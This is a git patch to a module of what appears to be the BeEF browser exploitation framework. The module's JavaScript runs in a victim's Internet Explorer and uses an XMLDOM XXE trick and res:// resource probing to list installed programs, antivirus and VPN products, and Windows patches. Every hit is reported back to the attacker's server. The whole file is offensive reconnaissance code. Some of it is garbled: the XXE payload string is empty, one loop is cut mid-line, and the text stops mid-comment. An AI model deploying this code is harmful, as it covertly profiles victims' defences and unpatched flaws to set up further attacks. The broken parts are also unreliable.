From 683937419977c9e80b93a34e946ef1c3fce54127 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sun, 9 Apr 2017 17:19:20 +0000 Subject: [PATCH] Replace Detect Software module --- modules/host/detect_software/command.js | 832 +++++++++++++++++++---- modules/host/detect_software/config.yaml | 9 +- modules/host/detect_software/module.rb | 8 +- 3 files changed, 692 insertions(+), 157 deletions(-) diff --git a/modules/host/detect_software/command.js b/modules/host/detect_software/command.js index f02352772..8c473beae 100644 --- a/modules/host/detect_software/command.js +++ b/modules/host/detect_software/command.js @@ -6,157 +6,689 @@ beef.execute(function() { - var files = [ - "Adobe/Reader 9.0/Reader/Tracker/add_reviewer.gif", - "NetWaiting/Logon.bmp", - "Windows NT/Pinball/table.bmp", - "InterVideo/WinDVD/Skins/WinDVD 5/Audio SRS Subpanel/Audio_SRS_Subpanel_Base_Mask.bmp", - "Java/jre1.6.0_02/lib/images/cursors/invalid32x32.gif", - "Common Files/Roxio Shared/9.0/Tutorial/Graphics/archive.gif", - "Windows Sidebar/Gadgets/Weather.Gadget/images/1px.gif", - "Pinnacle/Shared Files/Pixie/Register/hdr_register_1.gif", - "Adobe/Reader 8.0/Reader/BeyondReader/ENU/Onramp/acrobat.gif", - "eFax Messenger 4.3/Media/ENU/confidential.gif", - "InterActual/InterActual Player/help/images/btm_bckg.gif", - "Intuit/QuickBooks 2007/Components/Help/Updates/bolt.gif", - "Java/jre1.5.0_11/lib/images/cursors/win32_CopyDrop32x32.gif", - "Macromedia/Flash 8/en/First Run/HelpPanel/_sharedassets/check.gif", - "Microsoft Dynamics CRM/Client/res/web/_imgs/configure.gif", - "Microsoft Office/Live Meeting 8/Console/Playback/Engine/img/dropdown-arrow.gif", - "Microsoft Visual Studio 8/Common7/IDE/VBExpress/ProjectTemplatesCache/1033/MovieCollection.zip/Documentation/images/side-vb.gif", - "Mozilla Firefox/res/broken-image.gif", - "Mozilla Thunderbird/res/grabber.gif", - "TechSmith/SnagIt 9/HTML_Content/add-in.gif", - "VMware/VMware Player/help/images/collapse.gif", - "WildPackets/OmniPeek Personal/1033/Html/expert-red-yellow-on.gif", - "FreeMind/accessories/hide.png", - "HP/Digital Imaging/Skins/oov1/bc/img/bc-backLogo.png", - "Movie Maker/Shared/news.png", - "MySQL/MySQL Tools for 5.0/images/grt/db/column.png", - "Safari/Safari.resources/compass.png", - "ThinkVantage Fingerprint Software/rsc/logon.png", - "Trillian/plugins/GoodNews/icons/logo.png", - "Trillian/users/default/cache/account-AIM-offline.png", - "VideoLAN/VLC/http/images/delete.png", - "Virtual Earth 3D/Data/Atmosphere.png", - "Windows Media Connect 2/wmc_bw120.png", - "Analog Devices/SoundMAX/CPApp.ico", - "AT&T/Communication Manager/desktop.ico", - "ATI Technologies/ATI.ACE/branding.ico", - "Canon/ZoomBrowser EX/Program/CIGLibDisplayIcon.ico", - "CDBurnerXP Pro 3/Resources/cdbxp.ico", - "DivX/divxdotcom.ico", - "Fiddler/IE_Toolbar.ico", - "HP/SwfScan/SwfScan.ico", - "iPhone Configuration Utility/Document-Config.ico", - "Microsoft Device Emulator/1.0/emulator.ico", - "MSN/MSNCoreFiles/Install/msnms.ico", - "OpenVPN/openvpn.ico", - "Paros/paros_logo.ico", - "Adobe/Photoshop 6.0/Help/images/banner.jpg", - "iTunes/iTunes.Resources/genre-blues.jpg", - "Source Insight 3/images/SubBack.jpg", - "Canon/CameraWindow/MyCameraFiles/VI_JPG/XMAS22_VI01.JPG", - "Microsoft Office/OFFICE11/REFBAR.ICO", - "Microsoft Office/OFFICE12/REFBAR.ICO", - "Windows Media Player/Network Sharing/wmpnss_color48.jpg", - ] - var descriptions = [ - "Adobe Reader 9.0", - "WinDVD", - "Windows Pinball", - "Conexant NetWaiting", - "JRE 1.6.0_22", - "Roxio 9.0", - "Windows Weather Gadget", - "Pinnacle", - "Adobe Reader 8.0", - "eFax Manager 4.0", - "Interactual Player", - "Quickbooks", - "JRE 1.5.0_11", - "Flash 8", - "Microsoft CRM", - "Microsoft Live Meeting 8", - "Microsoft Visual Studio 8", - "Mozilla Firefox", - "Mozilla Thunderbird", - "Snagit 9", - "VMware Player", - "Omnipeek Personal", - "Freemind", - "HP Digital Imaging", - "Windows Movie Maker", - "MySQL Tools for 5.0", - "Safari", - "ThinkVantage Fingerprint Software", - "Trillian Plugin GoodNews", - "Trillian", - "VideoLAN VLC", - "Microsoft Virtial Earth 3D", - "Windows Media Connect 2", - "SoundMAX", - "AT&T Communications Manager", - "ATI Technologies ATI.ACE", - "Canon ZoomBrowser", - "CDBurnerXP Pro 3", - "DivX", - "Fiddler", - "HP's SwfScan", - "iPhone Configuration Utility", - "Microsoft Device Emulator", - "MSN", - "OpenVPN", - "Paros", - "Adobe Photoshop 6.0", - "iTunes", - "Source Insight 3", - "Canon CameraWindow", - "Microsoft Office 11", - "Microsoft Office 12", - "Windows Media Player" - ] - - if (navigator.appName != "Microsoft Internet Explorer") { - result = 'Software detection module only works in IE (so far)'; - beef.net.send("<%= @command_url %>", <%= @command_id %>, "detect_software="+result); - - // Using IE lets test for smb enum - } else { - var pic1 = new Image(); - pic1.src= "file:///\\127.0.0.1/C$/WINDOWS/system32/ntimage.gif"; - var pic2 = new Image(); - pic2.src= "file:///\\127.0.0.1/C$/Windows/Web/Wallpaper/img1.jpg"; + if (!("ActiveXObject" in window)) { + beef.debug('[Detect Software] Unspported browser'); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'fail=unsupported browser', beef.are.status_error()); + return false; + } - if (pic1.width == 28 && pic2.width == 28) { - result = 'SMB method of detecting software failed'; - beef.net.send("<%= @command_url %>", <%= @command_id %>, "detect_software="+result); - - // smb enum is working lets look for installed software - } else { - result = ''; - var sixtyfourbitvista = 0; - for (var x = 0; x < files.length; x++) { - var pic1 = new Image(); - pic1.src= "file:///\\127.0.0.1/C$/Program Files/" + files[x]; - - if (pic1.width != 28) { - result += descriptions[x]; - result += ' and '; - - } else { - pic1.src= "file:///\\127.0.0.1/C$/Program Files (x86)/" + files[x]; - if (pic1.width != 28) { - result += descriptions[x]; - result += ' and '; + var drive = 'C'; + var win_dir = 'WINDOWS'; + var program_dirs = ['Program Files', 'Program Files (x86)']; + var xmldom_supported = false; - sixtyfourbitvista = 1; - } - } - } - - beef.net.send("<%= @command_url %>", <%= @command_id %>, "detect_software="+result); - } + function detect_folder(path) { + var dtd = 'res://' + path; + var xml = ''; + var xmlDoc = new ActiveXObject("Microsoft.XMLDOM"); + xmlDoc.async = true; + try { + xmlDoc.loadXML(xml); + return false; + } catch (e) { + return true; } - + } + + // Test XMLDOM XXE technique + for (var i = 0; i < program_dirs.length; i++) { + var path = drive + ":\\" + program_dirs[i]; + var result = detect_folder(path); + if (result) { + xmldom_supported = true; + break; + } + } + + // Detect software using XMLDOM XXE technique + var software = [ + ['7zip', '7-Zip'], + ['Acoustica MP3 Audio Mixer', 'Acoustica MP3 Audio Mixer'], + ['Autodesk AutoCAD 2015', 'Autodesk\\AutoCAD 2015'], + ['Autodesk AutoCAD 2016', 'Autodesk\\AutoCAD 2016'], + ['Adobe Help', 'Adobe\\Adobe Help Viewer'], + ['Adobe Professional 7', 'Adobe\\Acrobat 7.0'], + ['Adobe Reader 7', 'Adobe\\Reader 7.0\\Reader'], + ['Adobe Reader 8', 'Adobe\\Reader 8.0\\Reader'], + ['Adobe Reader 9', 'Adobe\\Reader 9.0\\Reader'], + ['Adobe Reader 10', 'Adobe\\Reader 10.0\\Reader'], + ['Adobe Reader 11', 'Adobe\\Reader 11.0\\Reader'], + ['Ahead Nero', 'ahead'], + ['AirPcap', 'Riverbed\\AirPcap'], + ['Apple Software Update', 'Apple Software Update'], + ['Azureus', 'azureus'], + ['Baidu', 'baidu'], + ['BitComet', 'BitComet'], + ['BitSpirit', 'BitSpirit'], + ['BioExplorer', 'BioExplorer'], + ['Cisco Prime Data Center Network Manager', 'Cisco Systems\\dcm'], + ['Citrix', 'Citrix'], + ['DbVisualizer', 'DbVisualizer'], + ['eMule', 'eMule'], + ['eMule', 'easyMule2'], + ['Flash MX 2004', 'Macromedia\\Flash MX 2004'], + ['Flashget', 'FlashGet'], + ['Flashget 3', 'FlashGet Network\\FlashGet 3'], + ['FoxIt Reader', 'Foxit Software'], + ['FoxIt Reader', 'Foxit Reader'], + ['Free Nokia Ringtone Converter', 'Free Nokia Ringtone Converter'], + ['Git', 'Git'], + ['Gnome Music Player Client', 'Gnome Music Player Client'], + ['GnuPG', 'GNU\\GnuPG'], + ['Heroku', 'Heroku'], + ['HP AutoPass License Server', 'HP\\HP AutoPass License Server'], + ['HP TRIM', 'Hewlett-Packard\\HP TRIM'], + ['IceWeasel', 'IceWeasel'], + ['IncredibleCharts', 'IncredibleCharts'], + ['Internet Explorer', 'Internet Explorer'], + ['iTunes', 'iTunes'], + ['Java JRE 6', 'Java\\jre6'], + ['Java JRE 7', 'Java\\jre7'], + ['Java JRE 8', 'Java\\jre8'], + ['JetBrains dotPeek', 'JetBrains\\dotPeek'], + ['Juniper Network Connect 8.1', 'Juniper Networks\\Network Connect 8.1'], + ['JXplorer', 'jxplorer'], + ['Lexmark Markvision Enterprise', 'Lexmark\\Markvision Enterprise'], + ['Magellan MapSend Lite', 'Magellan\MapSend Lite'], + ['Microsoft Baseline Security Analyzer 2', 'Microsoft Baseline Security Analyzer 2'], + ['Microsoft Live Meeting 7', 'Microsoft Office\\live meeting 7'], + ['Microsoft SQL Server', 'Microsoft SQL Server'], + ['Microsoft SQL Server Compact Edition', 'Microsoft SQL Server Compact Edition'], + ['Microsoft Virtual PC', 'Microsoft Virtual PC'], + ['Microsoft Visual Studio 8', 'Microsoft Visual Studio 8'], + ['Microsoft Visual Studio 9', 'Microsoft Visual Studio 9'], + ['Microsoft Visual Studio 10', 'Microsoft Visual Studio 10'], + ['Microsoft Visual Studio 11', 'Microsoft Visual Studio 11'], + ['Microsoft Visual Studio 12', 'Microsoft Visual Studio 12'], + ['mIRC', 'mIRC'], + ['Mozilla Firefox', 'Mozilla Firefox'], + ['MSN Messenger', 'Messenger'], + ['NipperStudio', 'NipperStudio'], + ['KeePass Password Safe 2', 'KeePass Password Safe 2'], + ['NetBeans 8.1', 'NetBeans 8.1'], + ['NeuroServer', 'NeuroServer'], + ['Nokia PC Suite', 'Nokia\\Connectivity Cable Driver'], + ['Notepad Plus Plus', 'Notepad++'], + ['Opera', 'Opera'], + ['Oracle JavaFX 2.0 Runtime', 'Oracle\\JavaFX 2.0 Runtime'], + ['Outlook Express', 'Outlook Express'], + ['Paritech Pulse', 'Paritech\\Pulse'], + ['PGP Desktop', 'PGP Corporation\\PGP Desktop'], + ['Picasa2', 'picasa2'], + ['Proxifier', 'Proxifier'], + ['QuickTime', 'QuickTime'], + ['QLogic SANsurfer', 'QLogic Corporation\SANsurfer'], + ['radmin', 'Radmin'], + ['Real VNC4', 'RealVNC\\VNC4'], + ['RedGate .NET Reflector', 'Red Gate\\.NET Reflector'], + ['Resource Hacker', 'Resource Hacker'], + ['Safari', 'Safari'], + ['SeaMonkey', 'SeaMonkey'], + ['SiteKiosk', 'SiteKiosk'], + ['Spark', 'Spark'], + ['TeamSpeak 3 Client', 'TeamSpeak 3 Client'], + ['TinaSoft Easy Cafe Server', 'TinaSoft\\Easy Cafe Server'], + ['Trend Micro Deep Security Manager', 'Trend Micro\\Deep Security Manager'], + ['TrueCrypt', 'TrueCrypt'], + ['TopShare Portfolio Manager v2', 'TopShare Portfolio Manager V2'], + ['Samsung USB Drivers for Mobile Phones', 'SAMSUNG\\USB Drivers'], + ['Secure CRT', 'SecureCRT'], + ['Serv—U', 'RhinoSoft.com\\Serv—U'], + ['Skype', 'Skype\\Phone'], + ['SoapUI 5.0.0', 'SmartBear\\SoapUI-5.0.0'], + ['Thunder', 'Thunder Network\\Thunder'], + ['Thunder', 'Thunder Network\\Thunder6'], + ['Tencent QQDownload', 'Tencent\\QQDownload'], + ['VLC', 'VideoLAN\\VLC'], + ['Ultramon', 'ultramon\\ultramondesktop.exe'], + ['Unreal Media Server', 'UnrealStreaming\\UMediaServer'], + ['uTorrent', 'uTorrent'], + ['VMware Workstation', 'vmware\\vmware workstation'], + ['VMware Tools', 'VMware\\VMware Tools'], + ['VMware Workstation', 'VMware\\VMware Workstation'], + ['VirtualBox Guest Additions', 'Oracle\\VirtualBox Guest Additions'], + ['Winamp', 'winamp'], + ['Windows DVD Maker', 'DVD Maker'], + ['Windows Journal', 'Windows Journal'], + ['Windows Media Player', 'Windows Media Player'], + ['Windows Mail', 'Windows Mail'], + ['Windows Movie Maker', 'Movie Maker'], + ['Windows NetMeeting', 'NetMeeting'], + ['Windows Photo Viewer', 'Windows Photo Viewer'], + ['WinHex', 'WinHex'], + ['WinRAR', 'WinRAR'], + ['WinZip', 'WinZip'], + ['Wireshark', 'Wireshark'], + ['WinPcap', 'WinPcap'], + ['WinSCP', 'WinSCP'], + ['XFire', 'xfire'], + ['Xming', 'Xming X Server'], + ['Yahoo Messenger', 'Yahoo!\\Messenger'], + + // AntiVirus + ['360Safe', '360\\360Safe'], + ['360Safe', '360Safe'], + ['A-Squared Anti-Malware', 'A-Squared Anti-Malware'], + ['Agnitum Outpost Security Suite Pro', 'Agnitum\\Outpost Security Suite Pro'], + ['AhnLab', 'AhnLab'], + ['ESET Smart Security', 'ESET\\ESET Smart Security'], + ['ESTsoft ALYac Internet Security', 'ESTsoft\\ALYac'], + ['AhnLab', 'AhnLab\\Smart Update Utility'], + ['AhnLab V3 Internet Security Lite', 'AhnLab\\V3Lite'], + ['Avast AntiVirus 4', 'Alwil Software\\Avast4'], + ['Avast AntiVirus', 'AVAST Software\\Avast'], + ['AVG 2012', 'AVG\\AVG2012'], + ['AVG', 'AVG Secure Search'], + ['Avira AntiVir Desktop', 'Avira\\AntiVir Desktop'], + ['Avira AntiVir Personal Edition', 'Avira\\AntiVir PersonalEdition Classic'], + ['BitDefender', 'BitDefender'], + ['DrWeb AntiVirus', 'DrWeb'], + ['eScan AntiVirus', 'eScan'], + ['F-Secure ExploitShield', 'F-Secure\\ExploitShield'], + ['F-Secure Internet Security', 'F-Secure Internet Security\\FSPS'], + ['F-PROT Antivirus', 'FRISK Software\\F-PROT Antivirus for Windows'], + ['Kaspersky Internet Security 2012', 'Kaspersky Lab\\Kaspersky Internet Security 2012'], + ['Kaspersky Anti-Virus 2009', 'Kaspersky Lab\\Kaspersky Anti-Virus 2009'], + ['Kaspersky Anti-Virus 2010', 'Kaspersky Lab\\Kaspersky Anti-Virus 2010'], + ['Kaspersky Anti-Virus 2011', 'Kaspersky Lab\\Kaspersky Anti-Virus 2011'], + ['Kaspersky Anti-Virus 2012', 'Kaspersky Lab\\Kaspersky Anti-Virus 2012'], + ['Kaspersky Anti-Virus 2013', 'Kaspersky Lab\\Kaspersky Anti-Virus 2013'], + ['Kaspersky Anti-Virus 2014', 'Kaspersky Lab\\Kaspersky Anti-Virus 2014'], + ['Kaspersky Endpoint Security 8', 'Kaspersky Lab\\Kaspersky Endpoint Security 8 for Windows'], + ['Kaspersky Internet Security 2010', 'Kaspersky Lab\\Kaspersky Internet Security 2010'], + ['Kaspersky Internet Security 2009', 'Kaspersky Lab\\Kaspersky Internet Security 2009'], + ['Kingsoft AntiVirus', 'KingSoft\\kingsoft antivirus'], + ['IKARUS anti.virus', 'IKARUS\\anti.virus'], + ['Immunet AntiVirus', 'Immunet'], + ['JiangMin AntiVirus', 'JiangMin\\AntiVirus'], + ['Micropoint AntiVirus', 'Micropoint'], + ['Microsoft EMET 4.1', 'EMET 4.1'], + ['Microsoft EMET 5.0', 'EMET 5.0'], + ['McAfee Total Protection 2011', 'McAfeeMOBK'], + ['McAfee Enterprise', 'McAfee\\VirusScan Enterprise'], + ['McAfee Security Center', 'McAfee\\MSC'], + ['Norman Scan Engine', 'Norman\\Nse'], + ['Norton Internet Security', 'Norton Internet Security'], + ['Norton AntiVirus', 'Norton AntiVirus'], + ['nProtect Anti-Virus Spyware 3.0', 'INCAInternet\\nProtect Anti-Virus Spyware 3.0'], + ['PC Tools Antivirus Software', 'PC Tools Antivirus Software'], + ['Quick Heal Total Security', 'Quick Heal\\Quick Heal Total Security'], + ['Sucop Antivirus', 'Sucop\\SecPlugin'], + ['Rising AntiVirus', 'Rising\\RAV'], + ['Rising AntiVirus', 'Rising\\RIS'], + ['Rising Firewall', 'Rising\\RFW'], + ['Sunbelt Software Personal Firewall', 'Sunbelt Software\\Personal Firewall'], + ['Sophos Sophos Anti-Virus', 'Sophos\\Sophos Anti-Virus'], + ['Sophos Client Firewall', 'Sophos\\Sophos Client Firewall'], + ['SUPERAntiSpyware', 'SUPERAntiSpyware'], + ['Symantec Endpoint Protection', 'Symantec\\Symantec Endpoint Protection'], + ['Symantec Antivirus', 'symantec_client_security\\symantec antivirus'], + ['Trend Micro Internet Security', 'Trend Micro\\Internet Security'], + ['Trend Micro OfficeScan Client', 'Trend Micro\\OfficeScan Client'], + ['VirusBuster', 'VirusBuster'], + ['Windows Defender', 'Windows Defender'], + ['ZoneAlarm', 'Zone Labs\\ZoneAlarm'], + + // Office + ['Microsoft Office', 'Microsoft Office\\OFFICE'], + ['Microsoft Office 10', 'Microsoft Office\\OFFICE10'], + ['Microsoft Office 11', 'Microsoft Office\\OFFICE11'], + ['Microsoft Office 12', 'Microsoft Office\\OFFICE12'], + ['Microsoft Office 13', 'Microsoft Office\\OFFICE13'], + ['Microsoft Office 14', 'Microsoft Office\\OFFICE14'], + ['WPS Office', 'Kingsoft\\Kingsoft Office'], + ['WPS Office Personal', 'Kingsoft\\WPS Office Personal'], + ['WPS Office 2008', 'Kingsoft\\WPS Office 2008'], + ['WPS Office 2009', 'Kingsoft\\WPS Office 2009'], + ['WPS Office 2010', 'Kingsoft\\WPS Office 2010'], + + // Security + ['Cain', 'Cain'], + ['Echo Mirage', 'Echo Mirage'], + ['Fiddler2', 'Fiddler2'], + ['L0pht Crack 5', '@stake\\LC5'], + ['Immunity Debugger', 'Immunity Inc\\Immunity Debugger'], + ['Network Miner v2.1', 'NetworkMiner_2-1'], + ['Nmap', 'nmap'], + + // VPN + ['Checkpoint Endpoint Connect', 'Checkpoint\\Endpoint Connect'], + ['Cisco AnyConnect Secure Mobility Client', 'Cisco AnyConnect Secure Mobility Client'], + ['Cisco AnyConnect VPN Client', 'Cisco AnyConnect VPN Client'], + ['Fortinet FortiClient', 'Fortinet\\FortiClient'], + ['OpenVPN', 'OpenVPN'] + ]; + + if (xmldom_supported) { + beef.debug('[Detect Software] Enumerating software...'); + for (var i = 0; i < program_dirs.length; i++) { + for (var j = 0; j < software.length; j++) { + var path = drive + ":\\" + program_dirs[i] + "\\" + software[j][1]; + var result = detect_folder(path); + if (result) { + beef.debug('[Detect Software] Found software: ' + path); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_software=" + software[j][0]); + } + } + } + } + + // Enumerate patches (Win XP only) + var patches = [ + 'KB2570947', + 'KB2584146', + 'KB2585542', + 'KB2592799', + 'KB2598479', + 'KB2603381', + 'KB2619339', + 'KB2620712', + 'KB2631813', + 'KB2653956', + 'KB2655992', + 'KB2659262', + 'KB2661637', + 'KB2676562', + 'KB2686509', + 'KB2691442', + 'KB2698365', + 'KB2705219-v2', + 'KB2712808', + 'KB2719985', + 'KB2723135-v2', + 'KB2727528', + 'KB2749655', + 'KB2757638', + 'KB2770660', + 'KB2780091', + 'KB2802968', + 'KB2803821-v2_WM9', + 'KB2807986', + 'KB2813345', + 'KB2820917', + 'KB2834886', + 'KB2847311', + 'KB2850869', + 'KB2859537', + 'KB2862152', + 'KB2862330', + 'KB2862335', + 'KB2864063', + 'KB2868038', + 'KB2868626', + 'KB2876217', + 'KB2876331', + 'KB2892075', + 'KB2893294', + 'KB2898715', + 'KB2900986', + 'KB2904266', + 'KB2909212', + 'KB2914368', + 'KB2916036', + 'KB2922229', + 'KB2929961', + 'KB2930275', + 'KB2934207', + 'KB2936068', + 'KB2964358', + 'KB898461', + 'KB923561', + 'KB946648', + 'KB950762', + 'KB950974', + 'KB951376-v2', + 'KB951978', + 'KB952004', + 'KB952069_WM9', + 'KB952287', + 'KB952954', + 'KB953155', + 'KB954155_WM9', + 'KB955759', + 'KB956572', + 'KB956844', + 'KB959426', + 'KB960803', + 'KB960859', + 'KB961118', + 'KB968389', + 'KB969059', + 'KB970430', + 'KB970483', + 'KB971029', + 'KB971657', + 'KB972270', + 'KB973507', + 'KB973540_WM9', + 'KB973815', + 'KB973869', + 'KB973904', + 'KB974112', + 'KB974318', + 'KB974392', + 'KB974571', + 'KB975025', + 'KB975467', + 'KB975558_WM8', + 'KB975560', + 'KB975713', + 'KB976323', + 'KB977816', + 'KB977914', + 'KB978338', + 'KB978542', + 'KB978695_WM9', + 'KB978706', + 'KB979309', + 'KB979482', + 'KB979687', + 'KB981997', + 'KB982132', + 'KB982665' + ]; + + if (xmldom_supported) { + beef.debug("[Detect Software] Enumerating installed patches..."); + for (var i = 0; i < patches.length; i++) { + var path = drive + ":\\" + win_dir + "\\$NtUninstall" + patches[i] + "$"; + var result = detect_folder(path); + if (result) { + beef.debug('[Detect Software] Found patch: ' + path); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_patches=" + patches[i]); + } + } + } + + // Skip software detection using 'res' scheme and EXE/DLL resource images + // if XMLDOM XXE technique worked + if (xmldom_supported) return; + + + + // Detect software using 'res' scheme and EXE/DLL resource images + var dom = beef.dom.createInvisibleIframe(); + + // Enumerate patches (Win XP only) + var patches = [ + ["KB2964358", "mshtml.dll/2/2030"], // MS14-021 + ["KB2936068", "mshtmled.dll/2/2503"], // MS14-018 + ["KB2864063", "themeui.dll/2/120"], // MS13-071 + ["KB2859537", "ntkrpamp.exe/2/1"], // MS13-063 + ["KB2813345", "mstscax.dll/2/101"], // MS13-029 + ["KB2820917", "winsrv.dll/#2/#512"], // MS13-033 + ["KB2691442", "shell32.dll/2/130"], // MS12-048 + ["KB2676562", "ntkrpamp.exe/2/1"], // MS12-034 + ["KB2506212", "mfc42.dll/#2/#26567"], // MS11-024 + ["KB2483185", "shell32.dll/2/130"], // MS11-006 + ["KB2481109", "mstsc.exe/#2/#620"], // MS11-017 + ["KB2443105", "isign32.dll/2/#101"], // MS10-097 + ["KB2393802", "ntkrnlpa.exe/2/#1"], // MS11-011 + ["KB2387149", "mfc40.dll/#2/#26567"], // MS10-074 + ["KB2296011", "comctl32.dll/#2/#120"], // MS10-081 + ["KB979687", "wordpad.exe/#2/#131"], // MS10-083 + ["KB978706", "mspaint.exe/#2/#102"], // MS10-005 + ["KB977914", "iyuv_32.dll/2/INDEOLOGO"], // MS10-013 + ["KB973869", "dhtmled.ocx/#2/#1"] // MS09-037 + ]; + + beef.debug("[Detect Software] Enumerating installed patches..."); + for (var i=0; i", <%= @command_id %>, "installed_patches=" + this.title); dom.removeChild(this); } + img.onerror= function() { dom.removeChild(this); } + dom.appendChild(img); + } + + // Enumerate software + var software = [ + ["7zip", "7-Zip\\7zFM.exe/2/2002"], + ["Adobe Help", "Adobe\\Adobe Help Viewer\\1.0\\ahv.exe/#2/#132"], + ["Baidu", "baidu\\Baidu Hi\\BaiduHi.exe/#2/#152"], + ["Cain", "Cain\\UNWISE.EXE/2/106"], + ["Echo Mirage", "Echo Mirage\\unins000.exe/2/DISKIMAGE"], + ["FoxIt Reader", "Foxit Software\\Foxit Reader\\Foxit Reader.exe/2/257"], + ["FoxIt Reader", "Foxit Reader\\Foxit Reader.exe/#2/#484"], + ["Internet Explorer", "Internet Explorer\\iedvtool.dll/2/4000"], + ["Outlook Express", "Outlook Express\\msoeres.dll/2/1"], + ["KeePass Password Safe 2", "KeePass Password Safe 2\\unins000.exe/2/DISKIMAGE"], + ["Nokia PC Suite", "Nokia\\Connectivity Cable Driver\\nmwcdcocls.dll/2/131"], + ["Notepad Plus Plus", "Notepad++\\uninstall.exe/2/110"], + ["OpenVPN", "OpenVPN\\Uninstall.exe/2/110"], + ["Oracle JavaFX 2.0 Runtime", "Oracle\\JavaFX 2.0 Runtime\\bin\\eula.dll/2/204"], + ["Resource Hacker", "Resource Hacker\\ResHacker.exe/2/128"], + ["Samsung USB Drivers for Mobile Phones", "SAMSUNG\\USB Drivers\\Uninstall.exe/2/132"], + ["Tencent QQDownload", "Tencent\\QQDownload\\QQDownload.exe/2/132"], + ["QuickTime", "QuickTime\\QTinfo.exe/2/101"], + ["QuickTime", "QuickTime\\quicktimeplayer.exe/#2/#403"], + ["VLC", "VideoLAN\\VLC\\npvlc.dll/2/3"], + ["Immunity Debugger", "Immunity Inc\\Immunity Debugger\\ImmunityDebugger.exe/2/GOTO"], + ["Java JRE 6", "Java\\jre6\\bin\\awt.dll/2/CHECK_BITMAP"], + ["Java JRE 7", "Java\\jre7\\bin\\awt.dll/2/CHECK_BITMAP"], + ["Java JRE 8", "Java\\jre8\\bin\\awt.dll/2/CHECK_BITMAP"], + ["VMware Tools", "VMware\\VMware Tools\\TPVCGatewaydeu.dll/2/30994"], + ["VMware Tools", "VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/30995"], + ["VMware Workstation", "VMware\\VMware Workstation\\vmplayer.exe/#2/5"], + ["VMware Workstation", "VMware\\VMware Workstation\\vmware.exe/#2/#508"], + ["VirtualBox Guest Additions", "Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/110"], + ["Windows DVD Maker", "DVD Maker\\DVDMaker.exe/2/438"], + ["Windows Journal", "Windows Journal\\Journal.exe/2/112"], + ["Windows Mail", "Windows Mail\\msoeres.dll/2/1"], + ["Windows Movie Maker", "Movie Maker\\wmm2res.dll/2/201"], + ["Windows NetMeeting", "NetMeeting\\nmchat.dll/2/207"], + ["Windows Photo Viewer", "Windows Photo Viewer\\PhotoViewer.dll/2/#51209"], + ["WinRAR", "WinRAR\\WinRAR.exe/#2/#150"], + ["Microsoft Virtual PC", "Microsoft Virtual PC\\Virtual PC.exe/#2/150"], + ["Wireshark", "Wireshark\\uninstall.exe/2/110"], + + // AntiVirus software + ["360Safe", '360\\360Safe\\360leakfixer.exe/#2/110'], + ["360Safe", '360\\360Safe\\repairleakdll.dll/GIF/154'], + ["360Safe", '360Safe\\live.dll/#2/#203'], + ["360Safe", '360\\360safe\\360Safe.exe/2/131'], + ["ESTsoft ALYac Internet Security", 'ESTsoft\\ALYac\\AYUpdate.aye/2/30994'], + ["AhnLab", 'AhnLab\\Smart Update Utility\\SUpdate.exe/2/153'], + ["AhnLab V3 Internet Security Lite", 'AhnLab\\V3Lite\\V3LTray.exe/2/132'], + ["Avast AntiVirus 4", 'Alwil Software\\Avast4\\ashAvast.exe/2/267'], + ["Avast AntiVirus", 'AVAST Software\\Avast\\aswAra.dll/#2/101'], + ["AVG 2012", 'AVG\\AVG2012\\avguires.dll/#2/111'], + ["Avira AntiVir Desktop", 'Avira\\AntiVir Desktop\\ccquarc.dll/#2/101'], + ["Avira AntiVir Desktop", 'Avira\\AntiVir Desktop\\setup.dll/#2/132'], + ["Avira AntiVir Personal Edition", 'Avira\\AntiVir PersonalEdition Classic\\setup.dll/#2/#132'], + ["DrWeb AntiVirus", 'DrWeb\\spideragent.exe/#2/133'], + ["Kaspersky Internet Security 2012", 'Kaspersky Lab\\Kaspersky Internet Security 2012\\basegui.ppl/#2'], + ["Kaspersky Anti-Virus 2009", 'Kaspersky Lab\\Kaspersky Anti-Virus 2009\\oeas.dll/2/206'], + ["Kaspersky Anti-Virus 2010", 'Kaspersky Lab\\Kaspersky Anti-Virus 2010\\shellex.dll/2/103'], + ["Kaspersky Internet Security 2010", 'Kaspersky Lab\\Kaspersky Internet Security 2010\\shellex.dll/2/103'], + ["Kaspersky Internet Security 2009", 'Kaspersky Lab\\Kaspersky Internet Security 2009\\oeas.dll/2/206'], + ["Kingsoft AntiVirus", 'KingSoft\\kingsoft antivirus\\kislive.exe/#2/102'], + ["Rising AntiVirus", 'Rising\\RAV\\RavUsb.exe/#2/112'], + ["Rising AntiVirus", 'Rising\\Ris\\SetUp.exe/2/147'], + ["ESET Smart Security", 'ESET\\ESET Smart Security\\eguiEpfw.dll/#2/1070'], + ["JiangMin AntiVirus", 'JiangMin\\AntiVirus\\VirusBox.exe/#2/128'], + ["JiangMin AntiVirus", 'JiangMin\\Install\\KVOL.exe/2/202'], + ["Micropoint AntiVirus", 'Micropoint\\mfc90.dll/#2/30994'], + ["McAfee Total Protection 2011", 'McAfeeMOBK\\BootStrap.exe/#2/30994'], + ["McAfee Enterprise", 'McAfee\\VirusScan Enterprise\\graphics.dll/2/202'], + ["McAfee Security Center", 'McAfee\\MSC\\mclgview.exe/2/129'], + ["Norton Internet Security 16.0.0.125", 'Norton Internet Security\\Engine\\16.0.0.125\\SymSHAx9.dll/2/102'], + ["Norton Internet Security 16.5.0.135", 'Norton Internet Security\\Engine\\16.5.0.135\\SymSHAx9.dll/2/102'], + ["Norton AntiVirus 17.5.0.127", 'Norton AntiVirus\\MUI\\17.5.0.127\\images\\cssbase.dll/2/SCANTASKWZ_SCAN_ITEM_LIST.BMP'], + ["NOD32 Smart Security", 'ESET\\ESET Smart Security\\eguiEpfw.dll/2/1070'], + ["Trend Micro Internet Security", 'Trend Micro\\Internet Security\\UfSeAgnt.exe/2/30994'], + ["Trend Micro OfficeScan Client", 'Trend Micro\\OfficeScan Client\\PcNTMon.exe/2/30994'], + ["Sucop Antivirus", 'Sucop\\SecPlugin\\SecPlugin.dll/#2/211'], + ["Sophos Client Firewall", 'Sophos\\Sophos Client Firewall\\logo_rc.dll/2/114'], + ["Symantec Endpoint Protection", 'Symantec\\LiveUpdate\\AUPDATE.exe/2/129'], + ["ZoneAlarm", 'Zone Labs\\ZoneAlarm\\alert.zap/2/176'], + + // The following signatures were taken from: + // 